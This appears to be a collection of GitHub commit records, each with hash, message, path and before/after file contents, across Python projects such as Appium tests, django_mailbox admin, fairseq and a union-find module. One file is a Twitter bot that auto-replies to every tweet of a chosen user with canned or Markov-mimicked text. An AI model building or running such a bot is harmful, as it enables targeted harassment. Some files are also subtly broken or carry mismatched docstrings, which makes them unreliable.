'cmd' : [sdk.path_to_pub, 'global', 'run',
'stagehand', '-o', path, template],
'preamble': "Running stagehand...\n"
})
class DartCompleteFs(sublime_plugin.TextCommand):
cache = None
index = 0
user_interaction = False
fs_completer = None
locked_dir = ''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
DartCompleteFs.fs_completer = FileSystemCompletion(
casesensitive=(sublime.platform() == 'linux'))
def run(self, edit):
path = self.view.substr(sublime.Region(0, self.view.size()))
if not DartCompleteFs.cache or DartCompleteFs.user_interaction:
DartCompleteFs.user_interaction = False
DartCompleteFs.index = 0
DartCompleteFs.locked_dir = os.path.dirname(path)
items = DartCompleteFs.fs_completer.get_completions(
path,
force_refresh=True)
DartCompleteFs.cache = CircularArray(items)
if len(DartCompleteFs.cache) == 0:
DartCompleteFs.index = 0
return
content = os.path.join(DartCompleteFs.locked_dir,
next(DartCompleteFs.cache))
self.view.erase(edit, sublime.Region(0, self.view.size()))
# Change event of input panel runs async, so make sure it knows this
# time it was a non-interactive change.
DartStagehand.cancel_change_event = True
self.view.run_command('append', {'characters': content})
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.view.size()))
| Python | 0 | |
a7ece57eec28c771bcf2a23dc9c9e575223b1383 | add memory usage profiler script | proto/memory_test/calculate_rebot_model.py | proto/memory_test/calculate_rebot_model.py | # Copyright 2008-2011 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'src'))
from robot.result.builders import ResultFromXML
try:
import psutil
import objgraph
except ImportError:
print """
Please install psutil and objgraph - this script does not work without them.
"""
raise
def calculate_rebot_model(output_path):
xml = ResultFromXML(output_path)
p = psutil.Process(os.getpid())
print 'Process memory usage after xml parsing %f M' % (float(p.get_memory_info().rss) / (1024**2))
print 'Most common types'
objgraph.show_most_common_types()
return xml
if __name__ == '__main__':
if len(sys.argv) < 2:
print """
Simple memory profiler for robot output xml parsing.
Calculates memory usages after result model has been created.
usage:
calculate_rebot_model.py [PATH_TO_OUTPUT_XML]
"""
else:
calculate_rebot_model(sys.argv[1])
| Python | 0.000001 | |
680fb0bc3190acbb0bfd32f937d0e29b5641a1f2 | Create Strongly_Connect_Graph.py | Algorithm/Strongly_Connect_Graph.py | Algorithm/Strongly_Connect_Graph.py | # http://www.geeksforgeeks.org/strongly-connected-components/
# http://www.geeksforgeeks.org/connectivity-in-a-directed-graph/
'''
Given a directed graph, find out whether the graph is strongly connected or not. A directed graph is strongly connected if there is a path between any two pair of vertices. For example, following is a strongly connected graph.
`对于无向图来说判断连通非常简单,只需要做一次搜索,然后判断路径中是否经过了每个节点即可。但是有向图不可以这么做,比如上图,从节点0开始搜索可以经过所有节点,但是很明显它不是strongly connected。
Naive的方法是,对每一个节点做一次DFS,如果存在一个节点在DFS中没有经过每一个节点,那么则不是强连通图。这个算法复杂度是O(V*(V+E))。
或者用Floyd Warshall算法来找出任意两个节点的最短路径。复杂度是O(v3)。
一个更好的办法是强连通分量算法Strongly Connected Components (SCC) algorithm。我们可以用O(V+E)时间复杂度找出一个图中所有的SCC。如果SCC只有一个,那么这个图就是强连通图。
用Kosaraju算法,两个pass做DFS:
开一个visited数组,标记所有点为unvisited.
从任意顶点V走一次DFS,如果没有访问到所有顶点则返回false。
将所有边reverse。
把reverse后的图的所有定点重新标记为unvisited。
继续对新图走一次DFS,起点跟2中的顶点V。如果DFS没有访问到所有点则返回false,否则返回true。
'''
| Python | 0.000001 | |
2e985972aa4aad94bfda25ba852326b39498e4fa | Create Unique_Binary_Search_Trees.py | Array/Unique_Binary_Search_Trees.py | Array/Unique_Binary_Search_Trees.py | Given n, how many structurally unique BST's (binary search trees) that store values 1...n?
For example,
Given n = 3, there are a total of 5 unique BST's.
1 3 3 2 1
\ / / / \ \
3 2 1 1 3 2
/ / \ \
2 1 2 3
class Solution:
# @return an integer
# Recursion (172ms)
def numTrees_1(self, n):
if n <= 1: return 1
result = 0
for i in xrange(1,n+1):
result += self.numTrees(i-1)*self.numTrees(n-i)
return result
# DP (46ms)
def numTrees(self, n):
result = [0 for i in xrange(n+1)]
result[0] = 1; result[1] = 1
for i in xrange(2, n+1):
for j in xrange(1, n+1):
result[i] += result[j-1]*result[i-j]
return result[n]
# status: result[i]: the number of unique BST for a sequence of length i.
# initialize: result[0]= 1; result[1] = 1, only one combination to construct a BST out of a sequence
# function:
result[n] = F(1,n) + F[2,n] +...F[n,n]
F[i, n]: the number of unique BST, where the number i is the root of BST, and the sequence ranges from 1 to n.
F[i, n] = result[i-1] * result[n-i] 1<= i <= n
result[n] = result[0]*result[n-1] + result[1]*result[n-2]+..+result[n-1]*result[0]
# result: result[n]
| Python | 0.000001 | |
cd59d45813fbc23d76e1e9d12cf46d7df37d72c3 | Add remote_fs unittest (#410) | test/unit/webdriver/device/remote_fs_test.py | test/unit/webdriver/device/remote_fs_test.py | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import httpretty
import pytest
from selenium.common.exceptions import InvalidArgumentException
from appium.common.helper import appium_bytes
from appium.webdriver.webdriver import WebDriver
from test.unit.helper.test_helper import (
android_w3c_driver,
appium_command,
get_httpretty_request_body
)
class TestWebDriverRemoteFs(object):
@httpretty.activate
def test_push_file(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/push_file'),
)
dest_path = '/path/to/file.txt'
data = base64.b64encode(appium_bytes('HelloWorld', 'utf-8')).decode('utf-8')
assert isinstance(driver.push_file(dest_path, data), WebDriver)
d = get_httpretty_request_body(httpretty.last_request())
assert d['path'] == dest_path
assert d['data'] == str(data)
@httpretty.activate
def test_push_file_invalid_arg_exception_without_src_path_and_base64data(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/push_file'),
)
dest_path = '/path/to/file.txt'
with pytest.raises(InvalidArgumentException):
driver.push_file(dest_path)
@httpretty.activate
def test_push_file_invalid_arg_exception_with_src_file_not_found(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/push_file'),
)
dest_path = '/dest_path/to/file.txt'
src_path = '/src_path/to/file.txt'
with pytest.raises(InvalidArgumentException):
driver.push_file(dest_path, source_path=src_path)
@httpretty.activate
def test_pull_file(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/pull_file'),
body='{"value": "SGVsbG9Xb3JsZA=="}'
)
dest_path = '/path/to/file.txt'
assert driver.pull_file(dest_path) == str(base64.b64encode(appium_bytes('HelloWorld', 'utf-8')).decode('utf-8'))
d = get_httpretty_request_body(httpretty.last_request())
assert d['path'] == dest_path
@httpretty.activate
def test_pull_folder(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/pull_folder'),
body='{"value": "base64EncodedZippedFolderData"}'
)
dest_path = '/path/to/file.txt'
assert driver.pull_folder(dest_path) == 'base64EncodedZippedFolderData'
d = get_httpretty_request_body(httpretty.last_request())
assert d['path'] == dest_path
| Python | 0 | |
e2ba20d629fb35225140008437ddd93bcf516ba7 | Add translation for action short descriptions | django_mailbox/admin.py | django_mailbox/admin.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Model configuration in application ``django_mailbox`` for administration
console.
"""
import logging
from django.conf import settings
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from django_mailbox.models import MessageAttachment, Message, Mailbox
from django_mailbox.signals import message_received
from django_mailbox.utils import convert_header_to_unicode
logger = logging.getLogger(__name__)
def get_new_mail(mailbox_admin, request, queryset):
for mailbox in queryset.all():
logger.debug('Receiving mail for %s' % mailbox)
mailbox.get_new_mail()
get_new_mail.short_description = _('Get new mail')
def resend_message_received_signal(message_admin, request, queryset):
for message in queryset.all():
logger.debug('Resending \'message_received\' signal for %s' % message)
message_received.send(sender=message_admin, message=message)
resend_message_received_signal.short_description = (
_('Re-send message received signal')
)
class MailboxAdmin(admin.ModelAdmin):
list_display = (
'name',
'uri',
'from_email',
'active',
'last_polling',
)
readonly_fields = ['last_polling', ]
actions = [get_new_mail]
class MessageAttachmentAdmin(admin.ModelAdmin):
raw_id_fields = ('message', )
list_display = ('message', 'document',)
class MessageAttachmentInline(admin.TabularInline):
model = MessageAttachment
extra = 0
class MessageAdmin(admin.ModelAdmin):
def attachment_count(self, msg):
return msg.attachments.count()
attachment_count.short_description = _('Attachment count')
def subject(self, msg):
return convert_header_to_unicode(msg.subject)
def envelope_headers(self, msg):
email = msg.get_email_object()
return '\n'.join(
[('%s: %s' % (h, v)) for h, v in email.items()]
)
inlines = [
MessageAttachmentInline,
]
list_display = (
'subject',
'processed',
'read',
'mailbox',
'outgoing',
'attachment_count',
)
ordering = ['-processed']
list_filter = (
'mailbox',
'outgoing',
'processed',
'read',
)
exclude = (
'body',
)
raw_id_fields = (
'in_reply_to',
)
readonly_fields = (
'envelope_headers',
'text',
'html',
)
actions = [resend_message_received_signal]
if getattr(settings, 'DJANGO_MAILBOX_ADMIN_ENABLED', True):
admin.site.register(Message, MessageAdmin)
admin.site.register(MessageAttachment, MessageAttachmentAdmin)
admin.site.register(Mailbox, MailboxAdmin)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Model configuration in application ``django_mailbox`` for administration
console.
"""
import logging
from django.conf import settings
from django.contrib import admin
from django_mailbox.models import MessageAttachment, Message, Mailbox
from django_mailbox.signals import message_received
from django_mailbox.utils import convert_header_to_unicode
logger = logging.getLogger(__name__)
def get_new_mail(mailbox_admin, request, queryset):
for mailbox in queryset.all():
logger.debug('Receiving mail for %s' % mailbox)
mailbox.get_new_mail()
get_new_mail.short_description = 'Get new mail'
def resend_message_received_signal(message_admin, request, queryset):
for message in queryset.all():
logger.debug('Resending \'message_received\' signal for %s' % message)
message_received.send(sender=message_admin, message=message)
resend_message_received_signal.short_description = (
'Re-send message received signal'
)
class MailboxAdmin(admin.ModelAdmin):
list_display = (
'name',
'uri',
'from_email',
'active',
'last_polling',
)
readonly_fields = ['last_polling', ]
actions = [get_new_mail]
class MessageAttachmentAdmin(admin.ModelAdmin):
raw_id_fields = ('message', )
list_display = ('message', 'document',)
class MessageAttachmentInline(admin.TabularInline):
model = MessageAttachment
extra = 0
class MessageAdmin(admin.ModelAdmin):
def attachment_count(self, msg):
return msg.attachments.count()
def subject(self, msg):
return convert_header_to_unicode(msg.subject)
def envelope_headers(self, msg):
email = msg.get_email_object()
return '\n'.join(
[('%s: %s' % (h, v)) for h, v in email.items()]
)
inlines = [
MessageAttachmentInline,
]
list_display = (
'subject',
'processed',
'read',
'mailbox',
'outgoing',
'attachment_count',
)
ordering = ['-processed']
list_filter = (
'mailbox',
'outgoing',
'processed',
'read',
)
exclude = (
'body',
)
raw_id_fields = (
'in_reply_to',
)
readonly_fields = (
'envelope_headers',
'text',
'html',
)
actions = [resend_message_received_signal]
if getattr(settings, 'DJANGO_MAILBOX_ADMIN_ENABLED', True):
admin.site.register(Message, MessageAdmin)
admin.site.register(MessageAttachment, MessageAttachmentAdmin)
admin.site.register(Mailbox, MailboxAdmin)
| Python | 0.000001 |
f23c77d517dd88c38d5ad8fa0601bc61ccf17aa6 | Change url from 2016 to 2017 | pyconcz_2017/urls.py | pyconcz_2017/urls.py | from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView, RedirectView
from pyconcz_2017.common.views import homepage
prefixed_urlpatterns = [
url(r'^$', homepage, name='homepage'),
url(r'^announcements/', include('pyconcz_2017.announcements.urls')),
url(r'^proposals/workshops/$', RedirectView.as_view(url='/2017/proposals/talks')),
url(r'^proposals/', include('pyconcz_2017.proposals.urls')),
url(r'^about/team/', include('pyconcz_2017.team.urls')),
url(r'^speakers/', include('pyconcz_2017.speakers.urls')),
url(r'^sponsors/', include('pyconcz_2017.sponsors.urls')),
# static pages
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name='about'),
url(r'^about/code/$',
TemplateView.as_view(template_name='pages/code.html'),
name='about_code'),
url(r'^about/transparency_report/$',
TemplateView.as_view(template_name='pages/transparency.html'),
name='about_transparency'),
url(r'^about/brno/$',
TemplateView.as_view(template_name='pages/brno.html'),
name='about_brno'),
]
urlpatterns = (
static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) +
static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) +
[
url(r'^2017/', include(prefixed_urlpatterns)),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', RedirectView.as_view(url='/2017/')),
]
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
| from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView, RedirectView
from pyconcz_2017.common.views import homepage
prefixed_urlpatterns = [
url(r'^$', homepage, name='homepage'),
url(r'^announcements/', include('pyconcz_2017.announcements.urls')),
url(r'^proposals/workshops/$', RedirectView.as_view(url='/2016/proposals/talks')),
url(r'^proposals/', include('pyconcz_2017.proposals.urls')),
url(r'^about/team/', include('pyconcz_2017.team.urls')),
url(r'^speakers/', include('pyconcz_2017.speakers.urls')),
url(r'^sponsors/', include('pyconcz_2017.sponsors.urls')),
# static pages
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name='about'),
url(r'^about/code/$',
TemplateView.as_view(template_name='pages/code.html'),
name='about_code'),
url(r'^about/transparency_report/$',
TemplateView.as_view(template_name='pages/transparency.html'),
name='about_transparency'),
url(r'^about/brno/$',
TemplateView.as_view(template_name='pages/brno.html'),
name='about_brno'),
]
urlpatterns = (
static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) +
static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) +
[
url(r'^2016/', include(prefixed_urlpatterns)),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', RedirectView.as_view(url='/2016/')),
]
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
| Python | 0.999212 |
5becb57514c4b08fc7af2a9a4e38b2c8aac2f576 | Create computestats.py | effective_quadratures/computestats.py | effective_quadratures/computestats.py | #!/usr/bin/env python
import numpy as np
from utils import error_function
class Statistics(object):
"""
This subclass is an domains.ActiveVariableMap specifically for optimization.
**See Also**
optimizers.BoundedMinVariableMap
optimizers.UnboundedMinVariableMap
**Notes**
This class's train function fits a global quadratic surrogate model to the
n+2 active variables---two more than the dimension of the active subspace.
This quadratic surrogate is used to map points in the space of active
variables back to the simulation parameter space for minimization.
"""
# constructor
def __init__(self, coefficients, index_set):
self.coefficients = coefficients
self.index_set = index_set
def getMean(self):
"""
Train the global quadratic for the regularization.
:param ndarray Y: N-by-n matrix of points in the space of active
variables.
:param int N: merely there satisfy the interface of `regularize_z`. It
should not be anything other than 1.
:return: Z, N-by-(m-n)-by-1 matrix that contains a value of the inactive
variables for each value of the inactive variables.
:rtype: ndarray
**Notes**
In contrast to the `regularize_z` in BoundedActiveVariableMap and
UnboundedActiveVariableMap, this implementation of `regularize_z` uses
a quadratic program to find a single value of the inactive variables
for each value of the active variables.
"""
coefficients = self.coefficients
mean = coefficients[0,0]
return mean
def getVariance(self):
coefficients = self.coefficients
m, n = coefficients.shape
if m > n:
coefficients = coefficients.T
variance = np.sum(coefficients[0][1:m]**2)
return variance
# Function that computes first order Sobol' indices
def getFirstOrderSobol(self):
coefficients = self.coefficients
m, n = coefficients.shape
if m > n:
coefficients = coefficients.T
index_set = self.index_set
# Allocate memory!
index_set = index_set.getIndexSet()
index_set = np.mat(index_set)
m, dimensions = index_set.shape
variance = self.getVariance()
if dimensions == 1:
utils.error_function('ERROR: Sobol indices can only be computed for parameter studies with more than one parameter')
else:
index_set_entries = m
local_variance = np.zeros((index_set_entries, dimensions))
first_order_sobol_indices = np.zeros((dimensions))
# Loop for computing marginal variances!
for j in range(0, dimensions):
for i in range(0, index_set_entries): # no. of rows
# If the index_set[0,j] is not zero but the remaining are...
remaining_indices = np.arange(0, dimensions)
remaining_indices = np.delete(remaining_indices, j)
if(index_set[i,j] != 0 and np.sum(index_set[i, remaining_indices] ) == 0):
local_variance[i, j] = coefficients[0][i]
# Now take the sum of the squares of all the columns
for j in range(0, dimensions):
first_order_sobol_indices[j] = (np.sum(local_variance[:,j]**2))/(variance)
return first_order_sobol_indices
| Python | 0.000017 | |
36d0fc3c54dc0c91196c16875c1b1e2d9b0d38ea | Add basic unit test for LimitOffsetPagination | example/tests/unit/test_pagination.py | example/tests/unit/test_pagination.py | from collections import OrderedDict
from rest_framework.request import Request
from rest_framework.test import APIRequestFactory
from rest_framework.utils.urls import replace_query_param
from rest_framework_json_api.pagination import LimitOffsetPagination
factory = APIRequestFactory()
class TestLimitOffset:
"""
Unit tests for `pagination.LimitOffsetPagination`.
"""
def setup(self):
class ExamplePagination(LimitOffsetPagination):
default_limit = 10
max_limit = 15
self.pagination = ExamplePagination()
self.queryset = range(1, 101)
self.base_url = 'http://testserver/'
def paginate_queryset(self, request):
return list(self.pagination.paginate_queryset(self.queryset, request))
def get_paginated_content(self, queryset):
response = self.pagination.get_paginated_response(queryset)
return response.data
def get_test_request(self, arguments):
return Request(factory.get('/', arguments))
def test_valid_offset_limit(self):
"""
Basic test, assumes offset and limit are given.
"""
offset = 10
limit = 5
count = len(self.queryset)
last_offset = count - limit
next_offset = 15
prev_offset = 5
request = self.get_test_request({
self.pagination.limit_query_param: limit,
self.pagination.offset_query_param: offset
})
base_url = replace_query_param(self.base_url, self.pagination.limit_query_param, limit)
last_url = replace_query_param(base_url, self.pagination.offset_query_param, last_offset)
first_url = base_url
next_url = replace_query_param(base_url, self.pagination.offset_query_param, next_offset)
prev_url = replace_query_param(base_url, self.pagination.offset_query_param, prev_offset)
queryset = self.paginate_queryset(request)
content = self.get_paginated_content(queryset)
next_offset = offset + limit
expected_content = {
'results': list(range(offset + 1, next_offset + 1)),
'links': OrderedDict([
('first', first_url),
('last', last_url),
('next', next_url),
('prev', prev_url),
]),
'meta': {
'pagination': OrderedDict([
('count', count),
('limit', limit),
('offset', offset),
])
}
}
assert queryset == list(range(offset + 1, next_offset + 1))
assert content == expected_content
| Python | 0 | |
1eed076cc9140d35cd6897ef2bcb5fe0ae943e35 | Revert "remove bindings" | binding.gyp | binding.gyp | {
'targets': [
{
'target_name': 'sysinfo',
'conditions': [
['OS=="solaris"', {
'sources': [
'src/solaris.cpp'
]
}]
],
'sources': [
'src/binding.cpp',
],
'linkflags': [
'-Lbuild/cd Release/obj.target/sysinfo/src/'
],
'defines': [
'OS="<(OS)"',
'is_<(OS)'
],
}
]
}
| Python | 0 | |
9a83e01b9710943c50f80c8ffc4e5d5827cb3b92 | Check data preparation | main.py | main.py | from car_classifier import CarClassifier
if __name__ == "__main__":
car_img_dir = 'vehicles'
not_car_img_dir = 'non-vehicles'
sample_size = 8792
car_classifier = CarClassifier(car_img_dir=car_img_dir,
not_car_img_dir=not_car_img_dir,
sample_size = sample_size)
car_classifier.fit()
| Python | 0.000027 | |
5314f764dcfc62b3ec3fd29fdd86ae08dddfe08d | fix typo | main.py | main.py | import sys
from time import ctime
from tweepy import API
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
from credentials import *
from tweepy.utils import import_simplejson
import markovify
import random
import argparse
json = import_simplejson()
class Listener(StreamListener):
def __init__(self, api, followed_user_id, followed_user_handle, mock_mode):
super().__init__(api)
self.tweet_data = []
self.followed_user_id = followed_user_id
self.followed_user_handle = followed_user_handle
self.mock_mode = mock_mode
self.reply_list = []
self.next_reply = ''
self.load_next_reply(mock_mode)
def on_error(self, error):
print("Returned error code %s" % error)
return False
def on_status(self, status):
if status.user.id == self.followed_user_id:
tweet_text = '@%s %s' % (self.followed_user_handle, self.next_reply)
self.api.update_status(tweet_text)
print('%s: Tweeted:' % (ctime(), tweet_text))
if self.mock_mode:
self.update_mock_text(status.text)
self.load_next_reply(self.mock_mode)
def load_next_reply(self, mock=False):
if not mock:
with open('reply_list.txt', 'r') as reply_list_file:
self.reply_list = reply_list_file.readlines()
self.next_reply = random.choice(self.reply_list)
else:
with open('user_tweet_history.txt') as user_tweet_history_file:
text = user_tweet_history_file.read()
text_model = markovify.Text(text)
self.next_reply = text_model.make_short_sentence(140)
@staticmethod
def update_mock_text(text):
with open('user_tweet_history.txt', 'wa') as user_tweet_history_fd:
user_tweet_history_fd.write(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--handle',
required=True,
type=str,
dest='followed_handle',
action='store',
help='Twitter handle (without @)')
parser.add_argument('--mock',
dest='mock_mode',
default=False,
action='store_true',
help='enable mock mode')
args = parser.parse_args()
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = API(auth)
found_users = api.lookup_users(screen_names=[str(args.followed_handle)])
print found_users
if len(found_users) != 1:
print('Lookup for twitter handle %s failed' % args.followed_handle)
sys.exit()
followed_user_id = found_users[0].id
print followed_user_id
twitterStream = Stream(auth, Listener(api, followed_user_id, args.followed_handle, args.mock_mode))
twitterStream.filter(follow=[str(followed_user_id)], async=True)
| import sys
from time import ctime
from tweepy import API
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
from credentials import *
from tweepy.utils import import_simplejson
import markovify
import random
import argparse
json = import_simplejson()
class Listener(StreamListener):
def __init__(self, api, followed_user_id, followed_user_handle, mock_mode):
super().__init__(api)
self.tweet_data = []
self.followed_user_id = followed_user_id
self.followed_user_handle = followed_user_handle
self.mock_mode = mock_mode
self.reply_list = []
self.next_reply = ''
self.load_next_reply(mock_mode)
def on_error(self, error):
print("Returned error code %s" % error)
return False
def on_status(self, status):
if status.user.id == self.followed_user_id:
tweet_text = '@%s %s' % (self.followed_user_handle, self.next_reply)
self.api.update_status(tweet_text)
print(''%s: Tweeted:'' % (ctime(), tweet_text))
if self.mock_mode:
self.update_mock_text(status.text)
self.load_next_reply(self.mock_mode)
def load_next_reply(self, mock=False):
if not mock:
with open('reply_list.txt', 'r') as reply_list_file:
self.reply_list = reply_list_file.readlines()
self.next_reply = random.choice(self.reply_list)
else:
with open('user_tweet_history.txt') as user_tweet_history_file:
text = user_tweet_history_file.read()
text_model = markovify.Text(text)
self.next_reply = text_model.make_short_sentence(140)
@staticmethod
def update_mock_text(text):
with open('user_tweet_history.txt', 'wa') as user_tweet_history_fd:
user_tweet_history_fd.write(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--handle',
required=True,
type=str,
dest='followed_handle',
action='store',
help='Twitter handle (without @)')
parser.add_argument('--mock',
dest='mock_mode',
default=False,
action='store_true',
help='enable mock mode')
args = parser.parse_args()
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = API(auth)
found_users = api.lookup_users(screen_names=[str(args.followed_handle)])
print found_users
if len(found_users) != 1:
print('Lookup for twitter handle %s failed' % args.followed_handle)
sys.exit()
followed_user_id = found_users[0].id
print followed_user_id
twitterStream = Stream(auth, Listener(api, followed_user_id, args.followed_handle, args.mock_mode))
twitterStream.filter(follow=[str(followed_user_id)], async=True)
| Python | 0.999991 |
c99bee3628e55873e5bb9b6e98fd0455b6b45c64 | add examples for recipe 1.14 | code/ch_1-DATA_STRUCTURES_AND_ALGORITHMS/14-sorting_objects_without_native_comparison_support/main.py | code/ch_1-DATA_STRUCTURES_AND_ALGORITHMS/14-sorting_objects_without_native_comparison_support/main.py | def example_1():
class User:
def __init__(self, user_id):
self.user_id = user_id
def __repr__(self):
return 'User({})'.format(self.user_id)
users = [User(23), User(3), User(99)]
print(users)
print(sorted(users, key = lambda u: u.user_id))
from operator import attrgetter
print(sorted(users, key = attrgetter('user_id')))
print(min(users, key = attrgetter('user_id')))
print(max(users, key = attrgetter('user_id')))
if __name__ == '__main__':
example_1()
| Python | 0 | |
836d4ed6a3ddda4d381345a34358714db74af757 | Add an helper push program | share/examples/push.py | share/examples/push.py | import sys
import zmq
from zmq.utils.strtypes import b
def main():
# Get the arguments
if len(sys.argv) != 4:
print("Usage: push.py url topic num_messages")
sys.exit(1)
url = sys.argv[1]
topic = sys.argv[2]
num_messages = int(sys.argv[3])
# Create the socket
context = zmq.Context()
sock = context.socket(zmq.PUSH)
sock.connect(url)
for i in range(0, num_messages):
sock.send_multipart([b(topic), b("id"), b(str(i))])
if __name__ == "__main__":
main()
| Python | 0.000001 | |
cc7ecc419f75fa672ff215e7c6157bac8ebfb29e | Add union-find implementation | unionfind.py | unionfind.py | """
A simple Union-Find data structure implementation.
author:
Christos Nitsas
(chrisn654 or nitsas)
language:
Python 3(.4)
date:
July, 2014
"""
class UnionFindSimpleImpl:
"""
A simple Union-Find data structure implementation.
If n is the number of items in the structure, a series of m union
operations will take O(m * log(n)) time. Find operations are (amortized)
constant time (O(1)) though.
"""
def __init__(self, items):
"""Initialize the Union-Find structure from an iterable."""
self._items = set(items)
self._leader = dict()
self._followers = dict()
self._cluster_size = dict()
for item in self._items:
self._leader[item] = item
self._followers[item] = [item]
self._cluster_size[item] = 1
def __getitem__(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.find().
"""
return self._leader[item]
def find(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.__getitem__().
"""
return self[item]
def union(self, leader_A, leader_B):
"""
Joins together the two clusters that items leader_A
and leader_B represent.
"""
if leader_A == leader_B:
return
if self._cluster_size[leader_B] > self._cluster_size[leader_A]:
leader_A, leader_B = leader_B, leader_A
for follower in self._followers[leader_B]:
self._leader[follower] = leader_A
self._followers[leader_A].extend(self._followers[leader_B])
del(self._followers[leader_B])
self._cluster_size[leader_A] += self._cluster_size[leader_B]
del(self._cluster_size[leader_B])
def num_clusters(self):
"""Returns the current number of clusters."""
return len(self._cluster_size)
def items(self):
"""Returns a set containing all the items in the structure."""
return self._items
class UnionFindUnionByRankAndPathCompression:
"""
A faster Union-Find implementation with lazy unions (using union by
rank) and path compression.
A series of m union & find operations on a structure with n items
will need time O(m * a(n)), where a(n) is the reverse Ackerman
function.
"""
def __init__(self, items):
"""Initialize the Union-Find structure from an iterable."""
raise(NotImplementedError)
def __getitem__(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.find().
"""
raise(NotImplementedError)
def find(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.__getitem__().
"""
raise(NotImplementedError)
def union(self, leader_A, leader_B):
"""
Joins together the two clusters that items leader_A
and leader_B represent.
"""
raise(NotImplementedError)
def num_clusters(self):
"""Returns the current number of clusters."""
raise(NotImplementedError)
def items(self):
"""Returns a set containing all the items in the structure."""
raise(NotImplementedError)
_default_impl = UnionFindSimpleImpl
class UnionFindStructure:
"""
A Union-Find data structure interface.
It relies on a concrete Union-Find implementation such as
UnionFindSimpleImpl or UnionFindLazyUnionsAndPathCompressionImpl.
"""
def __init__(self, items, *, impl=_default_impl):
self._impl = impl(items)
def __getitem__(self, item):
return self._impl.__getitem__(item)
def __getattr__(self, name):
return getattr(self._impl, name)
| Python | 0 | |
c446c44b1f2023808d48609dbeb48c58fdba1cf3 | Add Adamax optimizer | fairseq/optim/adamax.py | fairseq/optim/adamax.py | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import torch
import torch.optim
from . import FairseqOptimizer, register_optimizer
@register_optimizer('adamax')
class FairseqAdamax(FairseqOptimizer):
def __init__(self, args, params):
super().__init__(args, params)
self._optimizer = Adamax(params, **self.optimizer_config)
@staticmethod
def add_args(parser):
"""Add optimizer-specific arguments to the parser."""
# fmt: off
parser.add_argument('--adamax-betas', default='(0.9, 0.999)', metavar='B',
help='betas for Adam optimizer')
parser.add_argument('--adamax-eps', type=float, default=1e-8, metavar='D',
help='epsilon for Adam optimizer')
parser.add_argument('--weight-decay', '--wd', default=0.0, type=float, metavar='WD',
help='weight decay')
parser.add_argument('--no-bias-correction', default=False, action='store_true',
help='disable bias correction')
# fmt: on
@property
def optimizer_config(self):
"""
Return a kwarg dictionary that will be used to override optimizer
args stored in checkpoints. This allows us to load a checkpoint and
resume training using a different set of optimizer args, e.g., with a
different learning rate.
"""
return {
'lr': self.args.lr[0],
'betas': eval(self.args.adamax_betas),
'eps': self.args.adamax_eps,
'weight_decay': self.args.weight_decay,
'bias_correction': not self.args.no_bias_correction,
}
class Adamax(torch.optim.Optimizer):
"""Implements Adamax algorithm (a variant of Adam based on infinity norm).
It has been proposed in `Adam: A Method for Stochastic Optimization`__.
